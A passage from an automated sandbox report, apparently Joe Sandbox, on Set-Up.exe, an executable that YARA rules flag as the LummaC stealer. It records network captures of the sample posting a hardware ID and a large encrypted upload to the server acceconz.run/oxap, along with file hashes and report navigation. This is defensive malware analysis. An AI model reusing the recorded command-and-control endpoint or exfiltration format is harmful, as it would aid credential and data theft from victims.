2025-04-13 14:21:33 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 14:21:33 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9l6499mtkuhQDAh2U%2FZIwhZCOqpbDe33bb983U9%2BisPUirFSeVkdZTYGpkv2GzsUnpAGIiK%2FaGwHDUWvvZzOU8rN1YwipjICj2t%2F9kupvkrmnn4L7lpc9Iqt4wUUMTY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fb9c486bc482ab-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=121463&min_rtt=121432&rtt_var=25662&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2826&recv_bytes=3460&delivery_rate=33225&cwnd=252&unsent_bytes=0&cid=e25eb4767bd76492&ts=569&x=0"
2025-04-13 14:21:33 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
2025-04-13 14:21:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49703	172.67.131.70	443	7936	C:\Users\user\Desktop\Set-Up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 14:21:34 UTC	271	OUT	POST /oxap HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=hKMn53GCp User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 588897 Host: acceconz.run
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: 2d 2d 68 4b 4d 6e 35 33 47 43 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 34 32 31 63 62 39 65 61 63 37 39 33 34 34 35 33 37 63 66 61 63 62 39 63 30 64 31 34 35 36 34 65 31 63 38 62 34 63 63 30 65 0d 0a 2d 2d 68 4b 4d 6e 35 33 47 43 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 68 4b 4d 6e 35 33 47 43 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 32 39 44 33 37 41 36 31 31 39 41 37 38 46 38 44 30 37 46 44 44 32 45 31 32 34 43 32 Data Ascii: --hKMn53GCpContent-Disposition: form-data; name="uid"a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e--hKMn53GCpContent-Disposition: form-data; name="pid"1--hKMn53GCpContent-Disposition: form-data; name="hwid"B529D37A6119A78F8D07FDD2E124C2
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: 7e 4a 87 66 82 4c b8 92 14 9b c4 43 7e 02 9a 86 e2 c3 65 c7 d7 4a 03 1e db cb 0d e7 dd 1a 63 ba be c4 17 2d 4a b6 5a 0f 77 c6 ed 0c 2d f1 b7 19 93 6d eb f3 15 b4 4e 4f 11 ed 3e 10 cb ad 4e 91 a5 78 e0 3f 2a f2 8a 66 77 7d e2 b5 52 7e fc 63 ad 38 28 0e 02 4f 37 cd 47 ff 33 dd 1e 34 24 fe a7 ce 71 66 f9 57 89 2a 29 ff 98 38 0a 7a 98 5a c2 77 22 c0 92 c6 65 17 d1 f3 e5 74 a7 66 61 fa df 79 a5 e6 d4 ef e3 6a a4 e1 d9 60 6b 63 b0 03 53 00 0a e2 fc 42 3a e8 46 87 83 38 a7 35 e2 e1 17 60 0b 1b 44 70 fb 7d c1 83 39 a9 06 15 cc 92 5e d6 33 46 93 68 43 90 63 11 7c 1b b1 8a 5e 00 ef 35 8c 5a 8c 22 e3 70 c8 5e cb 4c 45 c8 16 15 6b 83 16 96 9b 43 7c 19 4e 62 b9 69 c6 15 34 31 3d e4 92 30 25 69 94 46 66 3e 71 44 a9 51 3c 35 c7 ce 4d be 66 fe 51 1c 76 8a 26 15 a4 9b 49 Data Ascii: ~JfLC~eJc-JZw-mNO>Nx?fw}R~c8(O7G34$qfW)8zZw"etfayj`kcSB:F85`Dp}9^3FhCc\|^5Z"p^LEkC\|Nbi41=0%iFf>qDQ<5MfQv&I
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: b6 4f 3f b8 a0 19 81 75 17 ab c2 5f 29 70 c8 a2 ba d9 9f ba d2 f8 9a e4 13 67 20 89 58 29 de 95 be 48 99 d2 a3 fe e8 22 b9 c5 42 2c 36 7d 9c bf 3a 09 a4 fe 83 f7 b7 fe 90 c8 33 a3 6d e6 51 bd 79 70 e1 22 53 9a b8 ff 85 e7 a3 0f 8c f8 e9 d3 5e 9b 0d f3 38 02 50 db 01 9a e1 28 7d 3b 4e 92 45 3b db 3b 53 61 44 c1 5c ce 07 d6 62 9f c2 a9 cf 9d 06 0f 14 25 d1 73 32 a4 f0 9f 8f 05 4f 87 84 55 a5 fe d1 c9 24 ae 14 f6 6e a4 3a af 18 30 87 49 98 8b ad f8 1c 29 4e 99 ce cc 31 9f 87 b4 89 d7 55 46 f6 18 37 63 92 06 bc ad 2f d3 03 20 99 44 9b 73 bd e3 19 bc 59 dc c4 1a bf 32 36 d3 9c ff 84 6c 2e f0 27 d0 ed 55 3a 1c 49 d7 44 b8 0b 9d 70 fb d8 3f 62 d9 29 04 b2 86 ee 66 a4 b8 35 5c f3 13 6e cb d9 34 2c aa d9 69 f7 98 97 c1 27 3d c0 67 47 75 23 25 b9 ae eb f4 82 2e ad Data Ascii: O?u_)pg X)H"B,6}:3mQyp"S^8P(};NE;;SaD\b%s2OU$n:0I)N1UF7c/ DsY26l.'U:IDp?b)f5\n4,i'=gGu#%.
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: 73 59 5a b5 01 7b 48 6c 43 e3 04 5d 26 6a 80 1d 49 07 0c b4 76 3a 7d f8 4e cc b0 96 f3 08 b5 2a 3f a1 8f 4c 02 e2 5d 0e 43 43 a0 34 b7 44 cc 80 ce df ba fb 66 f4 01 28 7e fa 02 3b 8e 79 17 fe c2 58 b0 84 82 a7 10 13 38 aa dc ec 7a 18 05 2b c8 89 23 9e d8 3b 98 8e 7e 30 38 90 22 fb ce 5b 2a f3 0f eb 48 44 5a ec 2c 31 b3 1d 5b 40 6e 23 41 2c 05 ab 3b 07 f9 ed 29 dd c0 41 1d 9f fb 06 64 9d 27 7f 56 ef a6 5e eb 57 21 95 d4 04 3d f8 90 53 33 85 02 27 05 88 49 c7 07 0c ff 23 91 3f 7b 1c e8 6f bc 31 65 52 f2 f2 bd ac b2 9d f6 02 bb ab 6d 51 dd 3c 66 e2 21 a0 47 f1 6a ec 80 01 97 fe 2d 15 61 6a d2 36 39 2b 20 19 be 52 95 2e e0 d5 d6 78 6d d1 45 57 3a 13 34 63 5a 4e d8 40 13 a3 b9 17 f5 9d c9 27 9d b1 d8 e4 29 7d b5 94 36 4f 63 05 14 39 1d 4e 4c 86 4d 4b d3 a4 1c Data Ascii: sYZ{HlC]&jIv:}N?L]CC4Df(~;yX8z+#;~08"[HDZ,1[@n#A,;)Ad'V^W!=S3'I#?{o1eRmQ<f!Gj-aj69+ R.xmEW:4cZN@')}6Oc9NLMK
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: 10 65 fc 8c a3 c9 cf 81 94 f5 c0 44 71 2b cd 45 4b 2b 4c d1 c7 8c a3 a6 89 e2 af ff cd 58 e5 74 4c 57 1f 4b b6 9d ea e9 f6 79 c6 34 ec c4 c2 2c 84 78 df 33 ed c5 c6 db ad af 4b cb 42 fb bd cf d3 76 52 ef e5 d6 8a c7 cb 96 c4 bb 28 f7 55 76 49 df 06 5f 28 3f fb 3d e1 10 bb 94 6a e8 b6 d6 df 7b 7f 7d 12 3a 23 ee 36 87 33 e9 f1 3e 60 7a 5a 2a ca 22 3e 95 cf 59 54 64 0b 5c 24 58 c3 7f 7d 18 a3 05 f1 27 09 98 61 25 2b 98 9a 5d 78 14 0d 67 f5 c8 82 87 f1 39 f1 e6 fd 3b bb 23 ea f4 1d b5 6b 77 02 d9 b7 65 86 68 2f 01 1d c6 63 e3 c6 9c c1 85 0e 36 84 dc bf cf d7 b8 e6 8c c8 6d b6 d4 45 18 02 e1 98 b9 1b 72 18 4a a6 7b 3d 86 99 39 0c e3 a6 ec d6 f3 e8 e7 2c f3 40 bb 9a da 88 7c d1 03 d9 42 62 79 e9 65 0b a3 22 24 ca 6e 89 0b f6 7b c2 68 06 48 ff 18 93 b7 00 dc eb Data Ascii: eDq+EK+LXtLWKy4,x3KBvR(UvI_(?=j{}:#63>`zZ*">YTd\$X}'a%+]xg9;#kweh/c6mErJ{=9,@\|Bbye"$n{hH
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: ac 2d 49 c8 f2 50 00 c4 6c 13 c3 d0 ce a3 2c f3 3b d9 a7 d5 c5 aa c6 8f a8 7c 3f bc ec 87 34 fd e9 fc c3 a3 4c 33 77 74 6b 24 1b 33 42 70 14 dd d0 bf 87 15 a4 46 a0 dc b3 f3 83 04 cd c3 d1 17 7d 56 13 13 5a d9 37 f4 79 ef 3a ee 9c dc 0c e8 90 f9 4b 97 b5 6f 17 83 74 a0 ff 41 5f 64 b0 88 32 43 25 4d aa 88 43 ab 96 cc 18 3e bc e6 68 23 bc 07 db 6e 1a 04 e5 8f c0 f2 2d d1 f2 3e 00 3f b5 44 a0 0d b1 a7 24 f6 e7 f8 da 55 04 1f a5 f2 97 3b f5 bf a9 4d 85 26 73 6a 25 ca 79 0a d4 63 3d 7b 0d 7c 4a c2 54 cd 2d 21 42 5f 5f cd b9 a5 d0 41 ed 74 9c b7 dd eb e4 95 91 63 55 74 7a 1e 89 dd 38 7a 66 d1 b0 88 a6 ef 69 0d 1f ce ba 01 85 b3 c4 1b 78 3b 88 a2 c9 7e 43 82 ad 4c f5 a0 c2 6b b5 5e 84 e6 52 88 8a 0d e9 03 6a 37 96 c0 25 fd 44 a8 cf ae a9 14 f6 b7 25 38 ae 5c 17 Data Ascii: -IPl,;\|?4L3wtk$3BpF}VZ7y:KotA_d2C%MC>h#n->?D$U;M&sj%yc={\|JT-!B__AtcUtz8zfix;~CLk^Rj7%D%8\
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: 0d 7c c9 e9 12 42 f6 19 bb a8 eb 56 db 06 f3 9f 4b 38 6b 80 f3 71 b6 ce d7 c4 e9 50 25 f7 6c 01 3e 52 66 fe 51 ae ca 71 92 b6 5d 1d 11 c8 65 62 68 d7 b6 14 c4 bb 55 7f 56 1a 5e f1 6d 8a 87 64 ed ed 56 9b 6a 5a 02 db a1 7e 80 30 aa da 27 ed f2 a9 55 ba f6 05 e6 0b d7 2e c5 ce 18 84 3d f4 9f 9c 42 11 fd b3 a3 40 89 b8 a1 4a 78 1c 15 14 d8 67 53 55 94 36 f3 76 ef da df b9 47 a3 d7 b8 3e cc 46 85 f2 92 64 e4 89 20 35 8e 3c 80 0a 32 a0 58 0a 12 9d 0d 14 40 ec c9 f0 8f 8e 0c 2e fa 1b 7f 10 2d 6c 31 72 27 66 72 8f e6 7a d0 b6 01 95 7d 56 c3 04 ed d5 0c 01 8a 08 18 87 3d f7 37 de f7 58 da e5 f4 21 45 ee 18 09 4a bf 20 99 65 83 bd 25 69 c3 f6 a9 04 25 12 09 d4 af b3 2c a5 ed eb 59 ea 13 a2 2a c5 52 ec c0 53 b4 63 9f 22 f0 26 ab de 79 c0 8f f2 b1 9a c9 36 d2 e2 9a Data Ascii: \|BVK8kqP%l>RfQq]ebhUV^mdVjZ~0'U.=B@JxgSU6vG>Fd 5<2X@.-l1r'frz}V=7X!EJ e%i%,Y*RSc"&y6
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: 63 21 99 e8 42 e7 61 44 0e 73 48 98 50 8a 27 92 2a b9 35 0c c8 d6 1b e6 ff 01 fd 18 6c ed 08 3f 7b c2 4f fd d5 a8 00 0c fb 60 cf 39 cf 86 b6 f2 64 8c bb 5e fa 5d cc 01 9f 10 58 4a 33 9b 94 5c 2f b8 6e 20 ef d9 9e 82 dc 84 19 db 24 4e bf bd 94 4d 12 68 e3 ac cc 85 00 2b c4 54 34 15 00 26 f7 4e 68 cd 05 dd 54 48 27 b6 df 91 48 ae 3d 35 35 53 81 ae b0 6b eb 2f 98 76 18 3e 9b 73 8d eb 78 e4 37 09 aa 2e 3a 52 d9 ea 66 36 2b ba 1a 98 e4 12 46 ed ef 7e ec 23 cf 89 93 ac 28 70 6f 34 66 8c dc 71 60 e4 eb df 71 a3 61 3b 4e 0d 4c 8e 29 f4 8c 0d e1 d5 e9 d9 2a e5 19 61 b9 6f f7 f4 ab 2b 8c c6 80 e5 6c 34 4f ba aa 5d 2f 5e 94 76 1c 66 ca 2f b4 88 2d 37 31 1c e3 60 3e d0 91 fa f4 60 bb 6c 8c 19 65 8c 15 60 0d 8b ad b2 ad 78 07 81 70 5c 7c c2 88 67 e9 7b 78 0f 89 81 76 Data Ascii: c!BaDsHP'5l?{O`9d^]XJ3\/n $NMh+T4&NhTH'H=55Sk/v>sx7.:Rf6+F~#(po4fq`qa;NL)ao+l4O]/^vf/-71`>`le`xp\\|g{xv
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: a7 5f f6 b7 72 2a 2f 85 44 53 1a 5c 26 f2 8b 9b 91 b9 7b b9 e5 35 82 5f 03 51 e5 d3 36 7e 28 64 80 ff f5 ee b2 f0 3c 18 8c c9 2c 1d ce 67 21 80 18 a8 3c da 7d 1d 0c 85 b4 2c 65 96 c0 ba 05 8d 45 97 4f 35 08 48 9f 39 30 63 07 b2 9c a5 99 c2 7b 97 13 e2 a0 08 82 6a fd 45 b1 b7 f7 7d 48 04 9c 17 6d f7 5f 84 64 c9 bd 86 6c 4e 87 5c bc 67 e1 77 e2 ea ce 0d d5 fe 19 9e f2 e7 23 ab b9 49 92 51 80 bd 60 71 ee 78 0c b1 36 40 be cd 4f dc e5 e9 6c 05 3c bb 26 36 af 77 6c 13 63 97 0f 9e 0b b8 34 45 6a ab 96 a8 d2 08 7e fb c7 b1 93 0f 85 c9 72 83 2c 3d 4c ed 48 1a 77 5a cb 27 89 7f 84 54 e4 de 96 19 6c f9 b7 b4 64 3d 54 8b 49 0d a7 00 01 85 17 a9 6f 36 31 0c 2f 68 be 3f ec 4b 19 b0 9c c6 19 af 82 ba 28 62 bb 43 47 5a fe 4b a4 77 b5 51 ec 77 2f d8 55 50 c8 b8 02 64 87 Data Ascii: _r*/DS\&{5_Q6~(d<,g!<},eEO5H90c{jE}Hm_dlN\gw#IQ`qx6@Ol<&6wlc4Ej~r,=LHwZ'Tld=TIo61/h?K(bCGZKwQw/UPd
2025-04-13 14:21:34 UTC	15331	OUT	Data Raw: b3 54 d8 5c 36 ab cd 12 44 15 bf a7 47 1b 14 32 a1 e6 83 de 91 0e 3e e9 69 fe 67 77 14 d0 34 b4 0b 54 1e 6f 7b ce bc c4 5f 61 bd a2 41 1c 45 2c 94 96 04 69 b8 a3 7a 99 9a 87 72 81 cb 41 c0 6b 51 7a 51 96 7a ba b4 5b 49 7b bf b4 54 21 91 89 c7 6c ce 60 f5 7d e1 3d f7 b2 c4 8b 37 0d 1a 72 85 46 e6 f4 c4 cd 55 7b 0a 48 33 ca 0b 82 59 b4 db 11 de 5d bf fa e0 db 93 26 10 fd f2 a6 e3 c6 54 25 36 5d d5 a7 f3 6d 4d 01 9e fd ee ea 2f 54 86 34 5e 78 b4 07 8a 3d 6b 29 6a 38 bc 1b ce ab 44 d4 4f 06 91 66 92 f6 ff ae 79 6e 79 72 3d 15 61 c2 d0 e5 10 47 5c 2b c9 21 8a f0 cb 88 10 b5 f6 6f de 51 e8 3e 7d 43 e0 71 ae 80 86 91 62 6d a2 0f 74 f8 c2 b4 c5 b6 1f b5 50 de 94 1f 43 8a 46 41 65 bc 48 62 82 20 1c a0 90 85 d5 fe 78 01 df 38 27 23 d3 92 62 9e dc fa 85 99 23 e4 6c Data Ascii: T\6DG2>igw4To{_aAE,izrAkQzQz[I{T!l`}=7rFU{H3Y]&T%6]mM/T4^x=k)j8DOfynyr=aG\+!oQ>}CqbmtPCFAeHb x8'#b#l
2025-04-13 14:21:36 UTC	810	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 14:21:36 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oTo%2BT55AWFiat0ZYtrPsyTLg2OSB8UqtnUX0dtnJb%2BqbRG96GwU0ukprhaRNnoo9MyFRnkDWvwV7lskpIE7CfoLlsA8Dm5OJhs1Rp1C2yC0%2Fyos6MdsKyY4tq7ItAU0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fb9c508b8d825a-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=123632&min_rtt=123457&rtt_var=26202&sent=199&recv=448&lost=0&retrans=0&sent_bytes=2826&recv_bytes=591476&delivery_rate=32696&cwnd=252&unsent_bytes=0&cid=5a79d78179c18052&ts=2264&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49704	172.67.131.70	443	7936	C:\Users\user\Desktop\Set-Up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 14:21:36 UTC	261	OUT	POST /oxap HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 89 Host: acceconz.run
2025-04-13 14:21:36 UTC	89	OUT	Data Raw: 75 69 64 3d 61 34 32 31 63 62 39 65 61 63 37 39 33 34 34 35 33 37 63 66 61 63 62 39 63 30 64 31 34 35 36 34 65 31 63 38 62 34 63 63 30 65 26 63 69 64 3d 26 68 77 69 64 3d 42 35 32 39 44 33 37 41 36 31 31 39 41 37 38 46 38 44 30 37 46 44 44 32 45 31 32 34 43 32 33 34 Data Ascii: uid=a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e&cid=&hwid=B529D37A6119A78F8D07FDD2E124C234
2025-04-13 14:21:37 UTC	777	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 14:21:37 GMT Content-Type: application/octet-stream Content-Length: 43 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZHzpkTHxzIY8%2Fxptxp4mPjNV1DOLX4S4lDi7pHwWj3MReSQacaALTadxLYjECVzIV%2F7dZrFhOhdl7x6UOvdIi1jl38KKHidRLD3lMgVnGMmO7ZkU0E2vRHy0IRlnJ0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fb9c61491b32e3-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=113282&min_rtt=112779&rtt_var=24546&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=986&delivery_rate=35325&cwnd=252&unsent_bytes=0&cid=4d56dff282c3774f&ts=692&x=0"
2025-04-13 14:21:37 UTC	43	IN	Data Raw: 2b 28 b3 7a 8e 07 92 4c 4e 71 35 75 44 d9 58 fe 4d c4 6a e8 0b 54 6d e7 23 bd 83 13 27 37 2b e6 b5 49 48 77 b6 46 ca 0c b1 92 b3 Data Ascii: +(zLNq5uDXMjTm#'7+IHwF

Target ID:	3
Start time:	10:21:06
Start date:	13/04/2025
Path:	C:\Users\user\Desktop\Set-Up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-Up.exe"
Imagebase:	0x400000
File size:	4'910'680 bytes
MD5 hash:	9A0898E5AB58C270560B4B01A675B872
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1563331052.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1573928474.0000000002941000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1581016383.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1536461322.0000000003882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-Up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Windows Analysis Report
Set-Up.exe